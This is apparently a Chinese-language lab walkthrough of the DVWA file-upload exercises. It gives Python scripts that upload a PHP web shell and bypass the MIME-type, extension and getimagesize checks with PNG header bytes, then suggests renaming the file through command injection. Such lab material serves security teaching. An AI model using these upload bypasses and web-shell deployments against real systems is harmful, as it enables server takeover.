DVWA - File Upload (low, medium, high)

low

这个等级直接上传shell

import requests
import re

def main():
    headers = {
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=low'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    files = [('uploaded', ('wso.php', open('wso.php', 'rb'), 'application/octet-stream'))]
    res = requests.post(url, data=data, files=files, headers=headers)
    m = re.search(r'
(.*?)
', res.content, re.M | re.S)
    if m:
        print(m.group(1))


if __name__ == '__main__':
    main()

返回结果如下：

../../hackable/uploads/wso.php succesfully uploaded!
[Finished in 0.2s]

medium

查看源码，可发现代码限制了MIME类型和文件大小

if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) )

绕过思路，改一下MIME类型即可。

import requests
import re

def main():
    headers = {
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=medium'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    files = [('uploaded', ('wso.php', open('wso.php', 'rb'), 'image/jpeg'))]
    res = requests.post(url, data=data, files=files, headers=headers)
    m = re.search(r'
(.*?)
', res.content, re.M | re.S)
    if m:
        print(m.group(1))


if __name__ == '__main__':
    main()

high

查看源码，可发现代码限制了后缀名，文件大小和用getimagesize检查文件头并判断文件大小

// Is it an image? 
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) )

绕过思路：shell的后缀名改为jpg/jpeg/png，文件头插入jpg/png/gif的头部信息绕过getimagesize，这里我用png的头部信息（前8个字节）：

89 50 4E 47 0D 0A 1A 0A

注：用二/十六进制编辑器操作

import requests
import re

def main():
    headers = {
        'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=high'
    }
    url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
    data = {
        'Upload': 'Upload'
    }
    files = [('uploaded', ('wso.png', open('dog.php', 'rb'), 'application/octet-stream'))]
    res = requests.post(url, data=data, files=files, headers=headers)
    m = re.search(r'
(.*?)
', res.content, re.M | re.S)
    if m:
        print(m.group(1))


if __name__ == '__main__':
    main()

文件上传后，通过前面的command injection漏洞，使用mv命令将其后缀改为php。【这是一个梗，感觉上有不需要command injection的方法，希望路过的朋友指教一下】